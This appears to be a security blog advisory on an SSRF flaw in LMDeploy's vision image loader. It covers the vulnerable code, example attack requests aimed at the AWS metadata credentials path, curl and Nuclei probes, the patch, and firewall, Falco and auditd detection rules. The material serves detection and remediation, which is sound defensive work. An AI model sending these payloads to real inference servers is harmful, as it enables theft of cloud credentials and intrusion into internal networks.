Vulnerability Analysis

CVE-2026-33626: LMDeploy SSRF Flaw Exploited in Under 13 Hours — How to Find It & Fix It

Executive Summary

A Server-Side Request Forgery (SSRF) vulnerability in LMDeploy's vision-language image loader — tracked as CVE-2026-33626 — allows unauthenticated or low-privilege attackers to weaponize an AI model server's network identity, reaching internal services, cloud metadata endpoints, and IAM credential stores. First published in April 2026, the flaw was actively exploited in the wild within 13 hours of public disclosure, making this one of the fastest exploited AI infrastructure vulnerabilities on record. Organizations running LMDeploy for LLM inference — especially on cloud GPU instances — should patch to version 0.12.3 immediately.


1. What Is This Vulnerability?

LMDeploy is an open-source Python toolkit by InternLM for compressing, deploying, and serving large language models (LLMs). Its vision-language (VL) pipeline includes a helper function, load_image(), located in lmdeploy/vl/utils.py, that downloads images from URLs passed as part of a multimodal prompt.

The flaw: load_image() fetches arbitrary URLs with no validation of the destination IP address. No allowlist, no blocklist, no check for RFC1918 private ranges or link-local addresses. Whatever URL an attacker supplies, the model server will fetch it — and the response gets silently returned to the caller.

How the Vulnerable Code Looks

# VULNERABLE — lmdeploy/vl/utils.py (pre-0.12.3)
import requests
from PIL import Image
from io import BytesIO

def load_image(url: str) -> Image.Image:
    response = requests.get(url, timeout=10)   # No URL validation
    return Image.open(BytesIO(response.content))

An attacker providing a multimodal API request such as:

{
  "messages": [{
    "role": "user",
    "content": [
      {"type": "image_url", "image_url": {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}},
      {"type": "text", "text": "Describe this image."}
    ]
  }]
}

…receives the AWS Instance Metadata Service (IMDS) response embedded in the model's error output or streaming response — handing over temporary IAM credentials without any authentication bypass required.

Attack Vector

The attack surface is the model's public or internal API endpoint — any port exposing the LMDeploy OpenAI-compatible /v1/chat/completions route. The attacker:

  1. Sends a multimodal chat completion request with a crafted image_url pointing to an internal resource.
  2. The GPU server fetches the URL on the attacker's behalf.
  3. The HTTP response body is returned to the attacker (via error, streaming fragment, or image decode failure message).
  4. Targets include: AWS IMDS (169.254.169.254), GCP metadata (169.254.169.254/computeMetadata/v1/), Azure IMDS, internal Redis/MySQL hosts, secondary admin interfaces, and OOB DNS exfiltration endpoints.

Real-World Impact

Sysdig's threat research team detected active exploitation of their honeypot within 12 hours and 31 minutes of CVE disclosure. The attacker was observed:

  • Port-scanning the internal network behind the model server
  • Querying the AWS IMDS to harvest IAM role credentials
  • Reaching Redis and MySQL internal database ports
  • Using an out-of-band DNS endpoint for blind data exfiltration

Because GPU inference nodes typically run with broad IAM roles (for model artifact S3 access, logging, etc.), a single successful IMDS fetch can pivot into full cloud account compromise.


2. Who Is Affected?

Component Affected Versions
lmdeploy (PyPI) All versions < 0.12.3
InternLM LMDeploy GitHub All commits prior to the 0.12.3 release tag
Dockerized deployments Any container image built from pre-0.12.3 source
Cloud GPU instances (AWS/GCP/Azure) Highest risk — IMDS accessible by default
On-prem bare-metal deployments Elevated risk if internal services are reachable

You are NOT affected if:

  • You are running LMDeploy ≥ 0.12.3
  • You serve only text (non-VL) models with no vision pipeline loaded
  • Your deployment is fully air-gapped with no outbound HTTP from the inference node

3. How to Detect It (Testing)

Manual Testing Steps

  1. Identify the endpoint. Confirm the LMDeploy server is running and accepting multimodal requests:

    curl http://<host>:<port>/v1/models
    

    Look for a vision-capable model in the list (e.g., internlm-xcomposer, llava, etc.).

  2. Set up a listener. Use a service like Burp Collaborator or interactsh to capture out-of-band requests:

    interactsh-client -v   # records DNS/HTTP callbacks
    
  3. Send the SSRF probe. Submit a multimodal request with the OOB URL:

    curl -X POST http://<host>:<port>/v1/chat/completions \
      -H "Content-Type: application/json" \
      -d '{
        "model": "<vision-model-name>",
        "messages": [{
          "role": "user",
          "content": [
            {"type": "image_url", "image_url": {"url": "http://<your-interactsh-host>/ssrf-probe"}},
            {"type": "text", "text": "What is in this image?"}
          ]
        }]
      }'
    
  4. Check for internal metadata access. On cloud instances, target the IMDS:

    # Replace image_url with:
    "http://169.254.169.254/latest/meta-data/"
    

    If the server response contains metadata text (AMI ID, IAM role name, etc.) in any part of the response body or error message, the server is vulnerable.

  5. A positive result looks like: an HTTP callback recorded at your OOB listener, or metadata content reflected in the API error response.

Automated Scanning

  • Tool: Nuclei with a custom template

  • Template Concept:

    id: CVE-2026-33626-lmdeploy-ssrf
    info:
      name: LMDeploy Vision-Language SSRF
      severity: high
    requests:
      - method: POST
        path:
          - "{{BaseURL}}/v1/chat/completions"
        body: |
          {"model":"{{model}}","messages":[{"role":"user","content":[
            {"type":"image_url","image_url":{"url":"{{interactsh-url}}"}},
            {"type":"text","text":"describe"}]}]}
        matchers:
          - type: word
            part: interactsh_protocol
            words:
              - "http"
    
  • Expected output: Interaction detected at the OOB callback host.

  • Tool: Snyk — scan the Python environment:

    snyk test --package-manager=pip
    # Look for: lmdeploy @ <0.12.3 — SSRF (CVE-2026-33626)
    

Code Review Checklist

  • Search codebase for requests.get(url) or urllib.request.urlopen(url) called with user-supplied input
  • Verify load_image() or equivalent URL-fetching helpers validate destination IPs against a blocklist
  • Confirm RFC1918 ranges (10.x, 172.16-31.x, 192.168.x), link-local (169.254.x.x), and loopback (127.x) are blocked
  • Check that cloud metadata IP 169.254.169.254 is explicitly denied
  • Ensure no partial URL content is reflected back in error messages (information disclosure)

4. How to Fix It (Mitigation)

Step-by-Step Remediation

  1. Upgrade LMDeploy immediately.

    pip install --upgrade "lmdeploy>=0.12.3"
    

    Verify:

    python -c "import lmdeploy; print(lmdeploy.__version__)"
    # Expected: 0.12.3 or higher
    
  2. Rebuild Docker images if you maintain containerized deployments:

    # Update your requirements.txt or Dockerfile
    RUN pip install "lmdeploy>=0.12.3"
    

    Then rebuild and redeploy all running containers.

  3. Rotate any credentials exposed during the window. If your server was running a vulnerable version and was internet-accessible, assume IMDS credentials were harvested. Rotate IAM roles, API keys, and service account tokens immediately.

  4. Enable IMDSv2 on AWS EC2 instances to require token-based metadata requests (thwarts SSRF-based IMDS access even if SSRF exists):

    aws ec2 modify-instance-metadata-options \
      --instance-id <your-instance-id> \
      --http-tokens required \
      --http-endpoint enabled
    
  5. Restrict outbound network egress from inference nodes using security groups, NACLs, or iptables rules so they can only reach necessary destinations (model storage, logging sinks).

Code Fix Example

The patched load_image() in 0.12.3 implements IP validation before fetching:

# PATCHED — lmdeploy/vl/utils.py (>= 0.12.3)
import ipaddress
import socket
import requests
from urllib.parse import urlparse
from PIL import Image
from io import BytesIO

BLOCKED_NETWORKS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("169.254.0.0/16"),   # link-local / cloud IMDS
    ipaddress.ip_network("127.0.0.0/8"),       # loopback
    ipaddress.ip_network("::1/128"),
    ipaddress.ip_network("fc00::/7"),
]

def _is_safe_url(url: str) -> bool:
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False
    try:
        ip = ipaddress.ip_address(socket.gethostbyname(parsed.hostname))
    except (socket.gaierror, ValueError):
        return False
    return not any(ip in net for net in BLOCKED_NETWORKS)

def load_image(url: str) -> Image.Image:
    if not _is_safe_url(url):
        raise ValueError(f"Blocked URL (SSRF protection): {url}")
    response = requests.get(url, timeout=10)
    return Image.open(BytesIO(response.content))

Configuration Hardening

Beyond patching, harden the host environment:

# Block cloud metadata endpoint at iptables level (defense-in-depth)
iptables -A OUTPUT -d 169.254.169.254 -j DROP
ip6tables -A OUTPUT -d fe80::/10 -j DROP

# Restrict outbound to required destinations only
iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -d <model-storage-cidr> -j ACCEPT
iptables -A OUTPUT -j DROP

5. How to Test the Fix (Validation)

Regression Test Scenarios

  • Scenario A: Upgraded to 0.12.3, send the SSRF probe from Step 3 — confirm no OOB callback is received and the API returns a ValueError/400 response.
  • Scenario B: Send a legitimate multimodal request with a valid public image URL — confirm the model processes it normally (no regression in functionality).
  • Scenario C: Attempt to fetch http://127.0.0.1:<internal-port>/ via the image URL — confirm it is blocked.

Security Test Cases

Test Case 1: SSRF probe no longer triggers

  • Precondition: LMDeploy upgraded to ≥ 0.12.3
  • Steps: Submit multimodal request with image_url = http://169.254.169.254/latest/meta-data/
  • Expected Result: API returns HTTP 400 or 500 with a blocked/invalid URL error; no metadata content in response; no OOB callback recorded

Test Case 2: Private IP ranges blocked

  • Precondition: LMDeploy ≥ 0.12.3
  • Steps: Submit image_url = http://192.168.1.1/ and http://10.0.0.1/
  • Expected Result: Both requests rejected before any outbound connection

Test Case 3: Legitimate image URL still works

  • Precondition: LMDeploy ≥ 0.12.3, test with a known public image
  • Steps: Submit image_url = https://upload.wikimedia.org/wikipedia/commons/thumb/4/47/PNG_transparency_demonstration_1.png/280px-PNG_transparency_demonstration_1.png
  • Expected Result: Model responds normally to the multimodal prompt

Automated Tests

# pytest security regression test
import pytest
import requests

LMDEPLOY_BASE = "http://localhost:23333"
VISION_MODEL = "internlm-xcomposer"

SSRF_URLS = [
    "http://169.254.169.254/latest/meta-data/",
    "http://127.0.0.1/",
    "http://10.0.0.1/",
    "http://192.168.1.1/",
    "http://172.16.0.1/",
]

@pytest.mark.parametrize("ssrf_url", SSRF_URLS)
def test_ssrf_blocked(ssrf_url):
    resp = requests.post(f"{LMDEPLOY_BASE}/v1/chat/completions", json={
        "model": VISION_MODEL,
        "messages": [{
            "role": "user",
            "content": [
                {"type": "image_url", "image_url": {"url": ssrf_url}},
                {"type": "text", "text": "describe"}
            ]
        }]
    })
    # Must not return 200 with content from internal resource
    assert resp.status_code in (400, 422, 500), f"Expected error for SSRF URL: {ssrf_url}"
    body = resp.text.lower()
    assert "iam" not in body
    assert "ami-id" not in body
    assert "security-credentials" not in body

6. Prevention & Hardening

Best Practices

  • Validate all user-supplied URLs before making outbound HTTP requests in any server-side component. Never trust user input to determine fetch destinations.
  • Apply defense-in-depth at the network layer. Even if application-level URL validation fails, a firewall rule blocking access to 169.254.169.254 and RFC1918 ranges provides a critical safety net.
  • Pin AI/ML framework versions in your requirements.txt or pyproject.toml and automate dependency vulnerability scanning with Snyk, Dependabot, or OSV-Scanner in CI/CD.
  • Enforce IMDSv2 everywhere. Token-required IMDSv2 requires a PUT pre-flight that SSRF primitives cannot execute, effectively neutering IMDS-targeting SSRF on AWS.
  • Limit IAM permissions for inference nodes using least-privilege roles — they should not have iam:* or s3:* on all buckets.

Monitoring & Detection

Set up the following alerts to catch exploitation attempts in real time:

# 1. Alert on outbound connections to 169.254.169.254 from inference hosts
# (CloudWatch / VPC Flow Logs query)
filter (destinationAddress = "169.254.169.254") and sourceAddress like /10\./

# 2. SIEM rule: HTTP request to internal RFC1918 from GPU node process
# (Falco rule for container workloads)
- rule: LMDeploy SSRF Attempt
  desc: Outbound connection to private/IMDS IP from lmdeploy process
  condition: >
    outbound and proc.name="python" and
    (fd.rip startswith "10." or
     fd.rip startswith "172.16." or
     fd.rip = "169.254.169.254")
  output: "Possible SSRF: %proc.name connecting to %fd.rip"
  priority: CRITICAL

# 3. Monitor Python process DNS resolution for IMDS hostnames
# (auditd rule)
-a always,exit -F arch=b64 -S connect -F exe=/usr/bin/python3 -k ssrf_connect

Log aggregation: Forward inference node access logs to your SIEM and alert on:

  • Any request body containing the string 169.254.169.254
  • Unusually short image download times followed by large response payloads (possible metadata reflection)
  • Requests to internal hostnames/IPs from the model API endpoint

References

Latest from the blog

See all →